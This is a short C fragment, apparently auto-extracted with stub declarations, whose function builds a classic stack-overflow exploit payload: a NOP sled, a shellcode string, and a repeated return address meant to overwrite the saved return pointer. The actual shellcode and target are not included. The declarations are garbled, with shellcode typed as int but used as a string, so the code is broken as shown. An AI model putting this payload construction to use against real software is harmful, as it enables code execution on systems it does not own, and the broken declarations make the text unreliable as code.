
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int SHELLCODE_ADDR ;
 int memset (char*,int,int) ;
 int shellcode ;
 int strlen (int ) ;
 int strncpy (char*,int ,int) ;

void build_shellcode(char* p, int len)
{
 int i;

 i = len - 64 - strlen(shellcode);
 memset(p, 0x90, i);
 strncpy(&p[i], shellcode, strlen(shellcode));

 for (i = len - 64; i < len; i+= 4) {
  *(int*)&p[i] = SHELLCODE_ADDR;
 }
}
